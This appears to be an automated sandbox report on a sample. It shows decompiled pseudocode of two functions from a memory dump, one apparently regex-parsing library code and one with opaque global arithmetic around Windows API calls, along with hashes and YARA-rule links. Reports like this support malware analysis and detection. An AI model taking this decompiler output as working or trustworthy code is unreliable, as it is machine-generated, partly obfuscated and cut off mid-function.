Function 6E18CD5C, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 432
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E6E18CD5C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _t161;
				unsigned int _t162;
				intOrPtr _t163;
				signed int _t172;
				signed int _t179;
				signed int _t181;
				signed char* _t183;
				signed int _t187;
				signed int _t188;
				signed int _t191;
				signed int _t194;
				signed int _t198;
				void* _t201;
				signed int _t206;
				void* _t209;
				intOrPtr _t211;
				void* _t216;
				char _t217;
				void* _t224;
				char _t228;
				signed int _t230;
				signed int _t240;
				signed int _t248;
				signed int _t255;
				signed char* _t256;
				void* _t258;
				char _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t270;
				void* _t278;
				intOrPtr* _t292;
				signed char _t293;
				signed char _t295;
				intOrPtr _t299;
				void* _t302;
				signed char _t304;
				char _t308;
				char* _t328;
				signed int _t339;
				signed int _t340;
				void* _t341;
				void* _t342;
				signed char _t343;
				void* _t344;
				void* _t352;
				intOrPtr _t353;
				signed int _t354;
				char* _t356;
				signed int _t357;
				intOrPtr _t358;
				intOrPtr _t360;
				void* _t361;
				void* _t362;

				_t270 = __ecx;
				E6E1A9DBF(0x6e1ebf15, __ebx, __edi, __esi, 0x54);
				_t352 = _t270;
				_t356 = _t352 + 0xa8;
				_t266 =  *_t356;
				E6E187B3B(_t270);
				_t362 = _t266 - 0x5b;
				if(_t362 > 0) {
					__eflags = _t266 - 0x64;
					if(_t266 == 0x64) {
						_t161 =  *( *(_t361 + 8)) & 0x00000010 | 0x0000000e;
						__eflags = _t161;
						L72:
						_t162 = _t161 >> 1;
						L73:
						_push(_t162);
						L74:
						_t163 = E6E189BAB(_t266, _t352, _t352, _t356);
						L75:
						return E6E1A9D88(_t163);
					}
					__eflags = _t266 - 0x73;
					if(_t266 == 0x73) {
						_t161 =  *( *(_t361 + 8)) & 0x00000010 | 0x0000000a;
						goto L72;
					}
					__eflags = _t266 - 0x77;
					if(_t266 == 0x77) {
						_t161 =  *( *(_t361 + 8)) & 0x00000010 | 0x00000006;
						goto L72;
					}
					L68:
					_push(0);
					goto L74;
				}
				if(_t362 == 0) {
					 *(_t361 - 0x2c) = 0x3a;
					_t267 = 0;
					 *((intOrPtr*)(_t361 - 0x28)) = 1;
					_t272 = _t356;
					 *(_t361 - 0x24) = 0;
					 *(_t361 - 0x20) = 0;
					_t172 = E6E189048(_t356, _t361 - 0x2c);
					__eflags = _t172;
					if(_t172 == 0) {
						 *(_t361 - 0x2c) = 0x5e;
						 *((intOrPtr*)(_t361 - 0x28)) = 1;
						 *(_t361 - 0x24) = 0;
						 *(_t361 - 0x20) = 0;
						__eflags = E6E189048(_t272, _t361 - 0x2c);
						if(__eflags == 0) {
							 *(_t361 - 0x1c) = E6E1A9621(0, _t352, _t356, __eflags, 0x48);
							 *(_t361 - 4) = 3;
							_push(1);
						} else {
							E6E187B3B(_t352);
							 *(_t361 - 0x1c) = E6E1A9621(0, _t352, _t356, __eflags, 0x48);
							 *(_t361 - 4) = 2;
							_push(0);
						}
						_push( *( *(_t361 + 8)) & 0x00000010);
						 *((intOrPtr*)(_t361 - 0x14)) = E6E18B99F(_t267, _t175, _t352, _t356, __eflags);
						 *(_t361 - 4) =  *(_t361 - 4) | 0xffffffff;
						_t278 = _t352 + 0x14;
						while(1) {
							L34:
							E6E185E5E(_t278, _t176);
							while(1) {
								 *(_t361 - 0x2c) = _t267;
								 *((intOrPtr*)(_t361 - 0x28)) = 1;
								 *(_t361 - 0x24) = _t267;
								 *(_t361 - 0x20) = _t267;
								_t179 = E6E189048(_t356, _t361 - 0x2c);
								__eflags = _t179;
								if(_t179 != 0) {
									break;
								}
								 *((char*)(_t361 - 0x3c)) = 0x5d;
								 *((intOrPtr*)(_t361 - 0x38)) = 1;
								 *(_t361 - 0x34) = _t267;
								 *(_t361 - 0x30) = _t267;
								_t181 = E6E189048(_t356, _t361 - 0x3c);
								__eflags = _t181;
								if(_t181 != 0) {
									break;
								}
								_t228 =  *_t356;
								_t312 = 1;
								 *((char*)(_t361 - 0x18)) = _t228;
								__eflags =  *((intOrPtr*)(_t352 + 0xac)) - 1;
								if( *((intOrPtr*)(_t352 + 0xac)) != 1) {
									L36:
									 *((intOrPtr*)(_t361 - 0x58)) = _t312;
									 *((char*)(_t361 - 0x5c)) = 0x2d;
									 *(_t361 - 0x54) = _t267;
									 *(_t361 - 0x50) = _t267;
									_t230 = E6E189048(_t352 + 0xb8, _t361 - 0x5c);
									__eflags = _t230;
									if(_t230 == 0) {
										L39:
										_t80 =  *((intOrPtr*)(_t361 - 0x14)) + 0x18; // 0x0
										E6E18B1A5(_t80,  *((intOrPtr*)(_t361 - 0x18)));
										E6E187B3B(_t352);
										continue;
									}
									__eflags =  *((intOrPtr*)(_t352 + 0xcc)) - _t267;
									if( *((intOrPtr*)(_t352 + 0xcc)) != _t267) {
										goto L39;
									}
									_t358 =  *((intOrPtr*)(_t361 - 0x14));
									_t74 = _t358 + 4; // 0x6e1fc4b0
									E6E18B1A5(_t74,  *((intOrPtr*)(_t361 - 0x18)));
									_t76 = _t358 + 4; // 0x6e1fc4b0
									E6E18B1A5(_t76,  *(_t352 + 0xc8) & 0x000000ff);
									E6E187B3B(_t352);
									E6E187B3B(_t352);
									E6E187B3B(_t352);
									_t356 = _t352 + 0xa8;
									continue;
								}
								__eflags = _t228 - 0x2e;
								if(_t228 == 0x2e) {
									L33:
									_t176 = E6E18CD5C(_t267, _t352, _t352, _t356,  *(_t361 + 8));
									_t64 =  *((intOrPtr*)(_t361 - 0x14)) + 0x2c; // 0x5020
									_t278 = _t64;
									goto L34;
								}
								__eflags = _t228 - 0x77;
								if(_t228 == 0x77) {
									goto L33;
								}
								__eflags = _t228 - 0x57;
								if(_t228 == 0x57) {
									goto L33;
								}
								__eflags = _t228 - 0x73;
								if(_t228 == 0x73) {
									goto L33;
								}
								__eflags = _t228 - 0x53;
								if(_t228 == 0x53) {
									goto L33;
								}
								__eflags = _t228 - 0x64;
								if(_t228 == 0x64) {
									goto L33;
								}
								__eflags = _t228 - 0x44;
								if(_t228 == 0x44) {
									goto L33;
								}
								__eflags = _t228 - 0x5b;
								if(_t228 != 0x5b) {
									goto L36;
								}
								 *((intOrPtr*)(_t361 - 0x48)) = 1;
								 *((char*)(_t361 - 0x4c)) = 0x3a;
								 *(_t361 - 0x44) = _t267;
								 *(_t361 - 0x40) = _t267;
								_t240 = E6E189048(_t352 + 0xb8, _t361 - 0x4c);
								__eflags = _t240;
								if(_t240 == 0) {
									_t312 = 1;
									__eflags = 1;
									goto L36;
								}
								goto L33;
							}
							E6E187B3B(_t352);
							_t183 =  *(_t361 + 8);
							_t353 =  *((intOrPtr*)(_t361 - 0x14));
							__eflags =  *_t183 & 0x00000008;
							if(( *_t183 & 0x00000008) == 0) {
								L64:
								_t163 = _t353;
								goto L75;
							}
							_t90 = _t353 + 4; // 0x6e1fc4b0
							_t357 = _t267;
							 *(_t361 + 8) = _t90;
							_t92 = _t353 + 0xc; // 0x73616553
							asm("cdq");
							_t187 =  *_t92 - _t342 >> 1;
							 *(_t361 - 0x1c) = _t187;
							__eflags = _t187;
							if(_t187 <= 0) {
								L56:
								_t135 = _t353 + 0x20; // 0x74654728
								_t188 =  *_t135;
								 *(_t361 + 8) = _t188;
								__eflags = _t188;
								if(_t188 <= 0) {
									goto L64;
								} else {
									goto L57;
								}
								do {
									L57:
									_t137 = _t353 + 0x24; // 0x4d20
									_t191 = E6E1B660E(_t267, _t353,  *((char*)(_t267 +  *_t137)));
									__eflags = _t191;
									if(_t191 != 0) {
										_t139 = _t353 + 0x24; // 0x4d20
										_t206 = E6E18E78F(_t353, E6E1B6BA7( *((char*)(_t267 +  *_t139))));
										__eflags = _t206;
										if(_t206 == 0) {
											_t141 = _t353 + 0x24; // 0x4d20
											_t209 = E6E1B6BA7( *((char*)(_t267 +  *_t141)));
											_t143 = _t353 + 0x18; // 0x6e1fc4c4
											E6E18B1A5(_t143, _t209);
										}
									}
									_t144 = _t353 + 0x24; // 0x4d20
									_t194 = E6E1B6547(_t267, _t353,  *((char*)(_t267 +  *_t144)));
									__eflags = _t194;
									if(_t194 != 0) {
										_t146 = _t353 + 0x24; // 0x4d20
										_t198 = E6E18E78F(_t353, E6E1B6BD7( *((char*)(_t267 +  *_t146))));
										__eflags = _t198;
										if(_t198 == 0) {
											_t148 = _t353 + 0x24; // 0x4d20
											_t201 = E6E1B6BD7( *((char*)(_t267 +  *_t148)));
											_t150 = _t353 + 0x18; // 0x6e1fc4c4
											E6E18B1A5(_t150, _t201);
										}
									}
									_t267 = _t267 + 1;
									__eflags = _t267 -  *(_t361 + 8);
								} while (_t267 <  *(_t361 + 8));
								goto L64;
							}
							_t354 =  *(_t361 + 8);
							do {
								_t211 =  *((intOrPtr*)(_t354 + 0xc));
								_t292 = _t211 + _t357 * 2;
								_t343 =  *_t292;
								__eflags = _t343 - 0x5a;
								if(_t343 > 0x5a) {
									L49:
									_t293 =  *((intOrPtr*)(_t211 + _t357 * 2));
									__eflags = _t293 - 0x7a;
									if(_t293 > 0x7a) {
										goto L54;
									}
									__eflags =  *((char*)(_t211 + 1 + _t357 * 2)) - 0x61;
									if( *((char*)(_t211 + 1 + _t357 * 2)) < 0x61) {
										goto L54;
									}
									_t344 = 0x61;
									__eflags = _t293 - _t344;
									_t213 =  <  ? _t344 : _t293 & 0x000000ff;
									_t214 = ( <  ? _t344 : _t293 & 0x000000ff) & 0x000000ff;
									_t268 = E6E1B6BD7(( <  ? _t344 : _t293 & 0x000000ff) & 0x000000ff);
									_t216 = 0x7a;
									 *(_t361 + 8) = _t268;
									_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t354 + 0xc)) + 1 + _t357 * 2));
									__eflags = _t295 - _t216;
									_t346 =  >  ? _t216 : _t295 & 0x000000ff;
									_t296 =  >  ? _t216 : _t295 & 0x000000ff;
									_t217 = E6E1B6BD7( >  ? _t216 : _t295 & 0x000000ff);
									_t299 =  *((intOrPtr*)(_t354 + 0xc));
									 *((char*)(_t361 - 0x18)) = _t217;
									__eflags = _t268 -  *((intOrPtr*)(_t299 + _t357 * 2));
									if(_t268 <  *((intOrPtr*)(_t299 + _t357 * 2))) {
										L53:
										E6E18B1A5(_t354,  *(_t361 + 8));
										E6E18B1A5(_t354,  *((intOrPtr*)(_t361 - 0x18)));
										goto L54;
									}
									__eflags = _t217 -  *((intOrPtr*)(_t299 + 1 + _t357 * 2));
									if(_t217 <=  *((intOrPtr*)(_t299 + 1 + _t357 * 2))) {
										goto L54;
									}
									goto L53;
								}
								__eflags =  *((char*)(_t292 + 1)) - 0x41;
								if( *((char*)(_t292 + 1)) < 0x41) {
									goto L49;
								}
								_t302 = 0x41;
								__eflags = _t343 - _t302;
								_t221 =  <  ? _t302 : _t343 & 0x000000ff;
								_t222 = ( <  ? _t302 : _t343 & 0x000000ff) & 0x000000ff;
								_t269 = E6E1B6BA7(( <  ? _t302 : _t343 & 0x000000ff) & 0x000000ff);
								_t224 = 0x5a;
								 *(_t361 + 8) = _t269;
								_t304 =  *((intOrPtr*)( *((intOrPtr*)(_t354 + 0xc)) + 1 + _t357 * 2));
								__eflags = _t304 - _t224;
								_t348 =  >  ? _t224 : _t304 & 0x000000ff;
								_t305 =  >  ? _t224 : _t304 & 0x000000ff;
								_t308 = E6E1B6BA7( >  ? _t224 : _t304 & 0x000000ff);
								_t211 =  *((intOrPtr*)(_t354 + 0xc));
								 *((char*)(_t361 - 0x18)) = _t308;
								__eflags = _t269 -  *((intOrPtr*)(_t211 + _t357 * 2));
								if(_t269 <  *((intOrPtr*)(_t211 + _t357 * 2))) {
									L48:
									E6E18B1A5(_t354,  *(_t361 + 8));
									E6E18B1A5(_t354,  *((intOrPtr*)(_t361 - 0x18)));
									_t211 =  *((intOrPtr*)(_t354 + 0xc));
									goto L49;
								}
								__eflags = _t308 -  *((intOrPtr*)(_t211 + 1 + _t357 * 2));
								if(_t308 <=  *((intOrPtr*)(_t211 + 1 + _t357 * 2))) {
									goto L49;
								}
								goto L48;
								L54:
								_t357 = _t357 + 1;
								__eflags = _t357 -  *(_t361 - 0x1c);
							} while (_t357 <  *(_t361 - 0x1c));
							_t353 =  *((intOrPtr*)(_t361 - 0x14));
							_t267 = 0;
							__eflags = 0;
							goto L56;
						}
					}
					_t328 = _t361 - 0x60;
					E6E18C465(_t328);
					 *(_t361 - 4) = 0;
					while(1) {
						_push(_t328);
						 *((char*)(_t361 - 0x10)) =  *_t356;
						E6E18DEAB(_t361 - 0x60, _t361 - 0x10, 1);
						E6E187B3B(_t352);
						__eflags =  *_t356;
						if( *_t356 == 0) {
							break;
						}
						 *(_t361 - 0x2c) = 0x5d;
						_t328 = _t356;
						 *((intOrPtr*)(_t361 - 0x28)) = 1;
						 *(_t361 - 0x24) = _t267;
						 *(_t361 - 0x20) = _t267;
						_t255 = E6E189048(_t328, _t361 - 0x2c);
						__eflags = _t255;
						if(_t255 == 0) {
							continue;
						}
						break;
					}
					E6E187B3B(_t352);
					_t248 = E6E1A9621(_t267, _t352, _t356, __eflags, 0x10);
					_t359 = _t248;
					 *(_t361 - 0x1c) = _t248;
					 *(_t361 - 4) = 1;
					__eflags =  *(_t361 - 0x54);
					_t350 =  !=  ?  *(_t361 - 0x54) : 0x6e1fc3cb;
					_t360 = E6E18E84C(_t267, _t248, _t352, _t359,  !=  ?  *(_t361 - 0x54) : 0x6e1fc3cb,  *( *(_t361 + 8)) & 0x00000010);
					 *(_t361 - 4) = _t267;
					E6E185E5E(_t352 + 0x14, _t360);
					 *(_t361 - 4) =  *(_t361 - 4) | 0xffffffff;
					E6E1847D1();
					_t163 = _t360;
					goto L75;
				}
				if(_t266 == 0x2e) {
					_t256 =  *(_t361 + 8);
					_t339 =  !( *_t256) & 0x00000001;
					__eflags =  *_t256 & 0x00000010;
					if(( *_t256 & 0x00000010) == 0) {
						_t340 = _t339 + 1;
						__eflags = _t340;
					} else {
						_t340 = _t339 + 9;
					}
					_push(_t340);
					goto L74;
				}
				if(_t266 == 0x44) {
					__eflags =  *( *(_t361 + 8)) & 0x00000010;
					_t258 = 8;
					_t341 = 0x10;
					_t162 =  !=  ? _t341 : _t258;
					goto L73;
				}
				if(_t266 == 0x53) {
					_t161 =  *( *(_t361 + 8)) & 0x00000010 | 0x0000000c;
					goto L72;
				}
				if(_t266 != 0x57) {
					goto L68;
				} else {
					_t161 =  *( *(_t361 + 8)) & 0x00000010 | 0x00000008;
					goto L72;
				}
			}

0x6e18cd5c
0x6e18cd63
0x6e18cd68
0x6e18cd6a
0x6e18cd70
0x6e18cd72
0x6e18cd77
0x6e18cd7a
0x6e18d20a
0x6e18d20d
0x6e18d23f
0x6e18d23f
0x6e18d242
0x6e18d242
0x6e18d244
0x6e18d244
0x6e18d245
0x6e18d247
0x6e18d24c
0x6e18d251
0x6e18d251
0x6e18d20f
0x6e18d212
0x6e18d232
0x00000000
0x6e18d232
0x6e18d214
0x6e18d217
0x6e18d225
0x00000000
0x6e18d225
0x6e18d219
0x6e18d219
0x00000000
0x6e18d219
0x6e18cd80
0x6e18cdec
0x6e18cdf0
0x6e18cdf2
0x6e18cdfa
0x6e18cdfc
0x6e18cdff
0x6e18ce02
0x6e18ce07
0x6e18ce09
0x6e18ceb4
0x6e18ceb9
0x6e18cec0
0x6e18cec3
0x6e18cecb
0x6e18cecd
0x6e18cef3
0x6e18cef6
0x6e18cefd
0x6e18cecf
0x6e18ced1
0x6e18cede
0x6e18cee1
0x6e18cee8
0x6e18cee8
0x6e18cf07
0x6e18cf0f
0x6e18cf12
0x6e18cf16
0x6e18cfa2
0x6e18cfa2
0x6e18cfa3
0x6e18d025
0x6e18d028
0x6e18d02e
0x6e18d035
0x6e18d038
0x6e18d03b
0x6e18d040
0x6e18d042
0x00000000
0x00000000
0x6e18cf21
0x6e18cf28
0x6e18cf2f
0x6e18cf32
0x6e18cf35
0x6e18cf3a
0x6e18cf3c
0x00000000
0x00000000
0x6e18cf42
0x6e18cf46
0x6e18cf47
0x6e18cf4a
0x6e18cf50
0x6e18cfad
0x6e18cfb0
0x6e18cfba
0x6e18cfbe
0x6e18cfc1
0x6e18cfc4
0x6e18cfc9
0x6e18cfcb
0x6e18d010
0x6e18d016
0x6e18d019
0x6e18d020
0x00000000
0x6e18d020
0x6e18cfcd
0x6e18cfd3
0x00000000
0x00000000
0x6e18cfd5
0x6e18cfdb
0x6e18cfde
0x6e18cfea
0x6e18cfee
0x6e18cff5
0x6e18cffc
0x6e18d003
0x6e18d008
0x00000000
0x6e18d008
0x6e18cf52
0x6e18cf54
0x6e18cf92
0x6e18cf97
0x6e18cf9f
0x6e18cf9f
0x00000000
0x6e18cf9f
0x6e18cf56
0x6e18cf58
0x00000000
0x00000000
0x6e18cf5a
0x6e18cf5c
0x00000000
0x00000000
0x6e18cf5e
0x6e18cf60
0x00000000
0x00000000
0x6e18cf62
0x6e18cf64
0x00000000
0x00000000
0x6e18cf66
0x6e18cf68
0x00000000
0x00000000
0x6e18cf6a
0x6e18cf6c
0x00000000
0x00000000
0x6e18cf6e
0x6e18cf70
0x00000000
0x00000000
0x6e18cf75
0x6e18cf7f
0x6e18cf83
0x6e18cf86
0x6e18cf89
0x6e18cf8e
0x6e18cf90
0x6e18cfac
0x6e18cfac
0x00000000
0x6e18cfac
0x00000000
0x6e18cf90
0x6e18d04a
0x6e18d04f
0x6e18d052
0x6e18d055
0x6e18d058
0x6e18d206
0x6e18d206
0x00000000
0x6e18d206
0x6e18d05e
0x6e18d061
0x6e18d063
0x6e18d066
0x6e18d069
0x6e18d06c
0x6e18d06e
0x6e18d071
0x6e18d073
0x6e18d168
0x6e18d168
0x6e18d168
0x6e18d16b
0x6e18d16e
0x6e18d170
0x00000000
0x00000000
0x00000000
0x00000000
0x6e18d176
0x6e18d176
0x6e18d176
0x6e18d17e
0x6e18d184
0x6e18d186
0x6e18d188
0x6e18d199
0x6e18d19e
0x6e18d1a0
0x6e18d1a2
0x6e18d1aa
0x6e18d1b1
0x6e18d1b4
0x6e18d1b4
0x6e18d1a0
0x6e18d1b9
0x6e18d1c1
0x6e18d1c7
0x6e18d1c9
0x6e18d1cb
0x6e18d1dc
0x6e18d1e1
0x6e18d1e3
0x6e18d1e5
0x6e18d1ed
0x6e18d1f4
0x6e18d1f7
0x6e18d1f7
0x6e18d1e3
0x6e18d1fc
0x6e18d1fd
0x6e18d1fd
0x00000000
0x6e18d176
0x6e18d079
0x6e18d07c
0x6e18d07c
0x6e18d07f
0x6e18d082
0x6e18d084
0x6e18d087
0x6e18d0ef
0x6e18d0ef
0x6e18d0f2
0x6e18d0f5
0x00000000
0x00000000
0x6e18d0f7
0x6e18d0fc
0x00000000
0x00000000
0x6e18d100
0x6e18d101
0x6e18d106
0x6e18d109
0x6e18d115
0x6e18d119
0x6e18d11a
0x6e18d11d
0x6e18d121
0x6e18d126
0x6e18d129
0x6e18d12d
0x6e18d134
0x6e18d137
0x6e18d13a
0x6e18d13d
0x6e18d145
0x6e18d14a
0x6e18d154
0x00000000
0x6e18d154
0x6e18d13f
0x6e18d143
0x00000000
0x00000000
0x00000000
0x6e18d143
0x6e18d089
0x6e18d08d
0x00000000
0x00000000
0x6e18d091
0x6e18d092
0x6e18d097
0x6e18d09a
0x6e18d0a6
0x6e18d0aa
0x6e18d0ab
0x6e18d0ae
0x6e18d0b2
0x6e18d0b7
0x6e18d0ba
0x6e18d0c5
0x6e18d0c7
0x6e18d0ca
0x6e18d0cd
0x6e18d0d0
0x6e18d0d8
0x6e18d0dd
0x6e18d0e7
0x6e18d0ec
0x00000000
0x6e18d0ec
0x6e18d0d2
0x6e18d0d6
0x00000000
0x00000000
0x00000000
0x6e18d159
0x6e18d159
0x6e18d15a
0x6e18d15a
0x6e18d163
0x6e18d166
0x6e18d166
0x00000000
0x6e18d166
0x6e18cfa2
0x6e18ce0f
0x6e18ce12
0x6e18ce17
0x6e18ce1a
0x6e18ce1c
0x6e18ce1d
0x6e18ce29
0x6e18ce30
0x6e18ce35
0x6e18ce38
0x00000000
0x00000000
0x6e18ce3d
0x6e18ce42
0x6e18ce44
0x6e18ce4b
0x6e18ce4e
0x6e18ce51
0x6e18ce56
0x6e18ce58
0x00000000
0x00000000
0x00000000
0x6e18ce58
0x6e18ce5c
0x6e18ce63
0x6e18ce68
0x6e18ce6b
0x6e18ce6e
0x6e18ce7a
0x6e18ce7e
0x6e18ce90
0x6e18ce92
0x6e18ce99
0x6e18ce9e
0x6e18cea5
0x6e18ceaa
0x00000000
0x6e18ceaa
0x6e18cd85
0x6e18cdce
0x6e18cdd5
0x6e18cdd8
0x6e18cddb
0x6e18cde2
0x6e18cde2
0x6e18cddd
0x6e18cddd
0x6e18cddd
0x6e18cde3
0x00000000
0x6e18cde3
0x6e18cd8a
0x6e18cdbf
0x6e18cdc2
0x6e18cdc5
0x6e18cdc6
0x00000000
0x6e18cdc6
0x6e18cd8f
0x6e18cdb2
0x00000000
0x6e18cdb2
0x6e18cd94
0x00000000
0x6e18cd9a
0x6e18cda2
0x00000000
0x6e18cda2

APIs

__EH_prolog3.LIBCMT ref: 6E18CD63

Strings

^, xrefs: 6E18CEB4
], xrefs: 6E18CF21
:, xrefs: 6E18CF7F
-, xrefs: 6E18CFBA

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: -$:$]$^
API String ID: 431132790-1923447034
Opcode ID: c98ebfe99f0aca0f54b6258cb6b104cc0eb6716fa2ee0ffcd1aa9c1a7827e748
Instruction ID: 103cbc4d797479570d42f5b3b3403c3d9d604c5a71f0c795e7445abcd146c454
Opcode Fuzzy Hash: c98ebfe99f0aca0f54b6258cb6b104cc0eb6716fa2ee0ffcd1aa9c1a7827e748
Instruction Fuzzy Hash: C7F1D370A042499EEB04CBE8C490BEEBBFEAF55304F14495AD8559B281CB34E9C5EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E17D580, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 380
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E17D580(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t86;
				signed char _t87;
				signed int _t90;
				signed char _t92;
				signed char _t97;
				signed char _t98;
				signed char _t106;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed char _t121;
				signed int _t130;
				signed int _t134;
				signed int _t137;
				void* _t149;
				signed int _t154;
				signed int _t157;
				void* _t158;
				signed char _t162;
				signed char _t164;
				signed char _t168;
				signed char _t173;
				void* _t178;
				signed char _t185;
				signed char _t187;
				signed int _t190;
				signed char _t194;
				signed int _t198;
				signed char _t199;
				signed int _t204;
				signed int _t207;
				signed char _t210;
				signed int _t213;
				signed int _t219;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t229;
				signed char _t232;
				signed int _t233;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed char _t240;
				signed int _t242;
				signed char _t246;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				CHAR* _t258;
				signed int _t259;
				intOrPtr _t260;
				signed char _t268;
				signed int _t269;
				void* _t270;
				void* _t271;
				void* _t273;
				void* _t276;
				void* _t277;
				void* _t282;
				void* _t284;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t301;

				_t271 = __eflags;
				_t182 = __ebx;
				E6E1A9DF3(0x6e1e9c31, __ebx, __edi, __esi, 0x40);
				_t86 = E6E1A99E9(__ebx, __edi, __esi, _t271, 0x53a);
				_t224 =  *0x6e2189a0; // 0xf24087a
				_t258 = _t86;
				 *(_t270 - 0x48) = _t258;
				if(( *0x6e218999 & 0x000000ff) > _t224) {
					_t185 =  *0x6e218988; // 0xfbec8649
				} else {
					_t223 =  *0x6e2189f0; // 0xc8c83700
					_t178 = _t224 - _t223;
					 *0x6e218994 = _t223;
					 *0x6e21898c = 0;
					_t2 = _t178 + 0xc; // 0xf240886
					_t185 = _t2;
					 *0x6e218988 = _t185;
					 *0x6e2189f0 = _t185 - _t224 - 0x46;
				}
				_t87 =  *0x6e2189a4; // 0x2c
				_t225 = _t87 & 0x000000ff;
				_t273 =  *0x6e2189d4 - _t225; // 0x14
				if(_t273 <= 0) {
					 *0x6e2189c0 = _t185;
					_t173 = _t87 - _t185 + 0xc;
					 *(_t270 - 0x29) = _t173;
					asm("cdq");
					 *0x6e218988 = (_t173 & 0x000000ff) - _t225 - 0x46;
					 *0x6e21898c = _t225;
				}
				_t259 = GetWindowsDirectoryA(_t258, 0x53a) & 0x0000ffff;
				if( *0x6e21899c == 0) {
					_t90 =  *0x6e2189f0; // 0xc8c83700
					_t92 = _t90 -  *0x6e2189a0 + 0xc;
					__eflags = _t92;
					 *0x6e21898c = 0;
					 *0x6e218988 = _t92;
				} else {
					_t222 =  *0x6e2189f0; // 0xc8c83700
					_t168 =  *0x6e218988; // 0xfbec8649
					 *0x6e2189f0 = _t168 + _t222 * 2 + 0x19b4 +  *0x6e2189a0;
				}
				E6E17ECE1(_t270 - 0x28, "direct");
				 *(_t270 - 4) = 0;
				_t226 = 0;
				_t187 =  *(_t270 - 0x29);
				 *(_t270 - 0x3c) = _t259;
				 *0x6e222b18 = 0;
				_t260 =  *0x6e2189d8; // 0x7f
				 *0x6e2189f0 = (_t187 & 0x000000ff) * 7 - _t259;
				_t97 =  *0x6e2189a4; // 0x2c
				_t249 = _t97 & 0x000000ff;
				do {
					_t276 = _t249 -  *0x6e2189c4; // 0x2a
					if(_t276 == 0) {
						goto L13;
					} else {
						_t98 =  *0x6e218988; // 0x49
						_t187 = _t187 + _t98 -  *((intOrPtr*)(0x6e2189b0 + _t226 * 4)) - _t98 -  *((intOrPtr*)(0x6e2189b0 + _t226 * 4)) + 0xb;
						_t277 =  *0x6e218988 - _t260; // 0xfbec8649
						if(_t277 != 0 ||  *0x6e21898c != 0) {
							goto L13;
						}
					}
					break;
					L13:
					_t226 = _t226 + 1;
				} while (_t226 < 0x21);
				 *0x6e222b18 = _t226;
				 *(_t270 - 0x29) = _t187;
				CreateSemaphoreA(0, 7, 8, 0);
				_t250 =  *(_t270 - 0x29) & 0x000000ff;
				_t261 =  *(_t270 - 0x3c);
				_t190 = _t250 -  *(_t270 - 0x3c) + 0xffffffba;
				 *0x6e2189f0 = _t190;
				if( *0x6e21899c == 0) {
					 *0x6e21898c =  *0x6e21898c & 0x00000000;
					__eflags =  *0x6e21898c;
					 *0x6e218988 = _t190 -  *0x6e2189a0 + 0xc;
				} else {
					_t164 =  *0x6e218988; // 0xfbec8649
					 *0x6e2189f0 = _t164 + _t190 * 2 + 0x19b4 +  *0x6e2189a0;
				}
				E6E17B9B6(_t261);
				if( *0x6e2189e0 == 0) {
					_t194 =  *0x6e218988; // 0xfbec8649
					_t262 =  *0x6e21898c; // 0x0
					_t106 = _t194 -  *0x6e2189a4 + 0xc;
					__eflags = _t106;
					 *(_t270 - 0x29) = _t106;
				} else {
					_t162 =  *0x6e218988; // 0xfbec8649
					_t262 = 0;
					_t246 = ( *0x6e2189a4 & 0x000000ff) + 0x19b4 + _t250 + _t162 + _t162;
					 *(_t270 - 0x3c) = _t246;
					asm("adc esi, ecx");
					_t194 = _t246;
					 *0x6e218988 = _t194;
					 *0x6e21898c = 0;
				}
				_t227 =  *0x6e2189f0; // 0xc8c83700
				_t251 =  *0x6e2189a4 & 0x000000ff;
				_t229 = _t227 + 0x6893 + _t251;
				 *(_t270 - 0x34) = _t251;
				 *0x6e2189f0 = _t229;
				_t26 = _t229 + 3; // 0xc8c7ce70
				_t109 = _t26 + _t194 & 0x0000ffff;
				 *(_t270 - 0x40) = _t109;
				_t110 =  *0x6e218999 & 0x000000ff;
				_t232 = _t229 - _t109 + 0x24 +  *(_t270 - 0x29);
				_t282 = _t110 -  *0x6e2189a0; // 0xf24087a
				if(_t282 <= 0) {
					_t219 =  *0x6e2189f0; // 0xc8c83700
					_t262 = 0;
					_t157 =  *0x6e2189a0; // 0xf24087a
					_t158 = _t157 - _t219;
					 *0x6e218994 = _t219;
					 *0x6e21898c = 0;
					_t29 = _t158 + 0xc; // 0xf240886
					_t194 = _t29;
					 *0x6e218988 = _t194;
					 *0x6e2189f0 = _t194 -  *0x6e2189a0 - 0x46;
				}
				_t111 = _t232 & 0x000000ff;
				asm("cdq");
				_t284 = _t232 - _t262;
				if(_t284 < 0 || _t284 <= 0 && _t111 < _t194) {
					_t252 =  *0x6e2189ec; // 0xf5
				} else {
					_t252 = _t251 *  *0x6e2189ec;
					 *0x6e218988 = _t194 +  *(_t270 - 0x34) + 0x6893;
					asm("adc esi, 0x0");
					 *0x6e21898c = _t262;
					 *0x6e2189ec = _t252;
				}
				 *(_t270 - 0x38) = _t252;
				 *(_t270 - 0x3c) =  *(_t270 - 0x40) & 0x0000ffff;
				_t114 = E6E17D121( *(_t270 - 0x40) & 0x0000ffff);
